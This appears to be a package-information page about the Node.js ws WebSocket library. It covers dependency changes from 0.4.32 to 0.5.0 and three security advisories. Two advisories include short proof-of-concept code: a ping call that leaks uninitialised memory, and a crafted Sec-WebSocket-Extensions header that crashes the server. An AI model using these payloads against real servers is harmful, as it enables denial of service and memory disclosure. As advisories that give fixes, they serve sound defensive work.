The npm package ws, a popular choice for WebSocket communication in Node.js, saw a notable update from version 0.4.32 to 0.5.0. While maintaining its core promise of a fast, RFC-6455 compliant solution, the update introduced several changes relevant to developers.
One key difference lies in the listed dependencies. Version 0.5.0 replaces commander and tinycolor in its dependencies with ultron. The update includes **nan** with a major version update to the range of 1.4.x. These dependency adjustments may affect compatibility with existing projects, so careful consideration is recommended when upgrading. The **nan** update suggests improvements or fixes concerning native Node.js addons.
The development dependencies are also subtly altered. Notably, the **should** library jumps from 1.2.x to 4.3.x. This indicates potential updates and improvements in the testing suite, which can also indicate enhanced reliability and rigorous testing of the core functionalities of the software.
The update was released in November 2014, about three months after version 0.4.32. Developers should evaluate these changes in light of their project's requirements, paying close attention to the updated dependencies and development tools to ensure a smooth transition and benefit from any performance enhancements or bug fixes included in the newer version. The changes could affect integration and testing processes and also influence the selection of related libraries and tools within a project.
All the vulnerabilities related to the version 0.5.0 of the package
Remote Memory Disclosure in ws
Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.
In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.
var ws = require('ws')
var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')
client.on('open', function () {
console.log('open')
client.ping(50) // this sends a non-zeroed buffer of 50 bytes
client.on('pong', function (data) {
console.log('got pong')
console.log(data) // Data from the client.
})
})
Update to version 1.0.1 or greater.
DoS due to excessively large websocket message in ws
Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.
Update to version 1.1.1 or later.
Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
Update to version 3.3.1 or later.